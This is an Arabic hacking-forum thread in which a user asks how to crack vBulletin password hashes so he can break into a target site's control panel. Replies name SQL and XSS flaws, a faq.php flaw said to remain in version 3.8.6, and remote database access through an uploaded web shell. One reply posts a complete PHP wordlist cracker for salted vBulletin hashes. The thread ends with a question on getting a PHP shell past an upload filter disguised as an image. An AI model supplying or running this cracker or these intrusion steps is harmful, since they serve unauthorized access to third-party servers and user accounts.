شباب استفسار بخصوص هاش vBulletin

hank00sh · 05-29-2013, 10:19 AM

السلام عليكم ورحمه الله وبركاته

اخواني ما ابي اطول في الكلام هل فيه طريقة لتخطي الهاش هذا حق vBulletin والدخول الى لوحة التحكم

لانو هوا الحااااااااااااجز الوحيد الي من اول ما بديت تعلمت الهكر وهوا قدامي وماني داري كيف افكه

حاولت اتعلم لغات برمجه عشان تساعدني فيه بس ما فيه فايده

اذا فيه طريقة ومضمونه وتكون 2013 لا تبخلوون عليه فيها

تحياتي لكم

المصدر: :: vBspiders Professional Network ::

Vspan style="font-weight: bold; color: #006400;"Cl[hf:VLspanC afhf hsjtshv fow,w iha vBulletin

MaFia · 05-29-2013, 02:41 PM

هاش الفي بي صعب فكه وشبه مستحيل اذا كان معقد
لكن حاول تفكه ببرنامج باسورد برو ويلزمك معرفة السالت
salt
او عن طريق البحث عن الهاش في قواعد بيانات وفيه شروحات للمنتدى لهذه الطريقه

لكن سؤال

من اين جبت الهاش ؟ هل من ثغره sql اول من الاتصال بقاعدة البيانات

hank00sh · 05-29-2013, 09:21 PM

اقتباس

المشاركة الأصلية كتبت بواسطة Cyber Mafia


	هاش الفي بي صعب فكه وشبه مستحيل اذا كان معقد لكن حاول تفكه ببرنامج باسورد برو ويلزمك معرفة السالت salt او عن طريق البحث عن الهاش في قواعد بيانات وفيه شروحات للمنتدى لهذه الطريقه لكن سؤال من اين جبت الهاش ؟ هل من ثغره sql اول من الاتصال بقاعدة البيانات

من مسار لوحة التحكم الخاصه بسكربت الفبلتون من خلال السورس بيج

وحاولت اعدل على السورس بيج وغيرت الهاش الى هاش مفكوك وجاهز ما صلح يمكن فيه طريقة تكوين كود برمجي ينفع للكل بس للاسف خبرتي قليله في اللغات حقت البرمجه

تحياتي

mido868 معجب بهذا

MaFia · 05-29-2013, 11:20 PM

من الاساس هذه ليست ثغره شوفت في 2007 كذا موقع يحكي عنها لكنها ليست ثغره
الفي بي اقوى سكربت حتى لو كان فيه ثغره لن تستطيع استغلالها بسهوله

mido868 ,hank00sh معجبون بهذا

hank00sh · 05-30-2013, 03:59 PM

شكراً على تفاعلك اخوي Cyber Mafia بس والله مستغرب يعني الوحيد ما يقدر الواحد يهكره مره بالمره

وانت من خلال ما قلتلي انو ما فيه حتى لو فيه ثغره صعب تخترقه ولا فيه اي طريقه

اتذكر زمان نزلت ثغره في ملف التعليمات الي تطلع الديدا بيس وسويتها مره بس الكلام هذا زمان ونفعت معايا ما همني انا ابي حل كيف افك الهاش حقه لازم يكون فيه طريقه لانو كل شي يعتمد على البرمجه لو احد شاطر فيها خلاص كل شي متيسر وتحياتي لك

MaFia · 05-30-2013, 10:37 PM

الفي بي مو صعب تخترقه كل شخص وخبراته لكن الثغرات المعروفه اصبحت نادرة وشبه مستحيل يقع فيها مبرمج يعمل في هذه الشركه باستثناء
ثغرات
sql
x s s
اكثر انتشارا هذه الايام

اما ثغرة ملف
faq.php
التي تقصدها لساتها موجوده في الاصدار
3.8.6
في ملف اللغه الانجليزيه

ولازم يكون في شل مرفوع على السيرفر لكي تخترق المنتدى ولو كان الروت مفعل remote sql تستطيع الاتصال ريموت بهذه المعلومات وتتصل بالقاعدة

فك هاشات الفي بي ليس له حل جذري لكن انتظر اي شخص يجاوبك

hank00sh معجب بهذا

mido868 · 05-31-2013, 01:16 AM

اقتباس

المشاركة الأصلية كتبت بواسطة hank00sh


	شكراً على تفاعلك اخوي Cyber Mafia بس والله مستغرب يعني الوحيد ما يقدر الواحد يهكره مره بالمره وانت من خلال ما قلتلي انو ما فيه حتى لو فيه ثغره صعب تخترقه ولا فيه اي طريقه اتذكر زمان نزلت ثغره في ملف التعليمات الي تطلع الديدا بيس وسويتها مره بس الكلام هذا زمان ونفعت معايا ما همني انا ابي حل كيف افك الهاش حقه لازم يكون فيه طريقه لانو كل شي يعتمد على البرمجه لو احد شاطر فيها خلاص كل شي متيسر وتحياتي لك

حبيبى ممكن تجرب السكربت هذا

او هناك طريقة ثانية اللى الجميع يعرفها فايرفوكس +Live HTTP Headers
وتقدر تتابعها من هنا
http://www.nextgenupdate.com/forums/...ecryption.html

والكود التالى لسكربت php لم اجربه لكن تقدر تجرب هذا ما اتسطعت ان اساعد به

كود PHP:

  
<?php 

set_time_limit(0); 

error_reporting(0); 

$name = $_SERVER['PHP_SELF']; 

$go = true; 

 
echo " 

_____ _ _ _____ _____ _______ 

/ ___| | | | | / _ \ / ___/|__ __| 

| | _ | |__| | | | | | | |___ | | 

| | | | | __ | | | | | \___ \ | | 

| |_| | | | | | | |_| | ___| | | | 

\_____/ |_| |_| \_____/ /_____/ |_| 

____ _ _____ _____ _____ ___ ___ 

| _ \ | | / _ \ / _ \ | _ \ \ \ / / 

| |_) | | | | | | | | | | | | | | \ \ \/ / 

| _ ( | | | | | | | | | | | | | | \ / 

| |_) | | |___ | |_| | | |_| | | |_| / | | 

|____/ |_____| \_____/ \_____/ |_____/ |__|[*]-----------------------------------------------------------------------[*] 

[+] Script Name : Vbulletin Hash Cracker 

[+] Version : 1.0 

[+] Programed By : G-B 

[+] Email : [email=g22b@hotmail.com]g22b@hotmail.com[/email] 

[+] Use : php $name[*]-----------------------------------------------------------------------[*] 

 
"; 

 
while($go){ 

$b = true; 

$c = true; 

$d = true; 

$k = false; 

while($b){ 

echo "[+] Hash -> "; 

$hash = trim(stdin()); 

if(strlen($hash) < 30){ 

echo "[*] This Is Not MD5. Try Again.\n"; 

}else{ 

$b = false; 

} 

} 

while($c){ 

echo "[+] Salt -> "; 

$salt = trim(stdin()); 

if(strlen($hash) < 3){ 

echo "[*] This Is Not Salt. Try Again.\n"; 

}else{ 

$c = false; 

} 

} 

while($d){ 

echo "[+] Wordlist Link -> "; 

$list = trim(stdin()); 

if(!file_get_contents($list)){ 

echo "[*] Can't Open Wordlist. Try Again.\n"; 

}else{ 

$d = false; 

} 

} 

 
echo "\n\n"; 

echo "[*]------------------------------Start------------------------------------[*]\n\n"; 

 
$wordlist = file_get_contents($list); 

$words = explode("\n",$wordlist); 

foreach($words as $pass){ 

$pass = trim($pass); 

$md5 = md5(md5($pass).$salt); 

echo "[*] Try $pass \n"; 

if($md5 == $hash){ 

echo "\n\n[*] Password Cracked : $pass"; 

$k = true; 

break; 

} 

} 

if(!$k){ 

echo "\n\n[*] Can't Found Password In Wordlist."; 

} 

 
echo "\n\n[+] Crack Another Hash ? (Y) or (N) -> "; 

$try = stdin(); 

if($try == 'N' || $try == 'n'){ 

$go = false; 

} 

} 

echo "[*] See U Later G-B."; 

#============================================== 

function stdin(){ 

$fp = fopen("php://stdin","r"); 

$line = trim(fgets($fp)); 

fclose($fp); 

return $line; 

} 

#=========================================== 

?>

hank00sh معجب بهذا

hank00sh · 05-31-2013, 02:19 AM

يعطيكم العافيه اخواني وبخصوص الكود اخوي انا ماني رافع شيل عشان استخدمه اقصد الاسكربت

ماني رافع شيل على السيرفر عشان استخدمه انا مستهدف موقع وحاااب اخش عليه من هذا الموقع عشان اقدر ارفع شيل

من خلال لوحة تحكم المنتدى بس اخو سايبر وضحلي نقطه انو في سكربت فيه ثغرهfaq.php

وراح احاول اجدها في السيرفر لعلي اوقعلي فيها واقدر من خلالها معرفة الديدا بيس والدخول على الموقع على طول او رفع الشيل

وعندي سوال بسيط الحين مواقع الرفع وبالذات موقع ترادنت حاولت ارفع شيل بصيغه صوره مع انو مكتوب الاحجام المقبلوه ومن ظمنها فيه بي اتش بي بس رفعتو يقلي خطا ورفعتو عن طريق اداة live HTTP الي في الفاير فوكس وتحياتي لكم

mido868 معجب بهذا

التواصل المباشر مع الادارة والاعضاء القدامى من خلال قناة التلغرام

شباب استفسار بخصوص هاش vBulletin

جـــ'ابات العناكــ'ب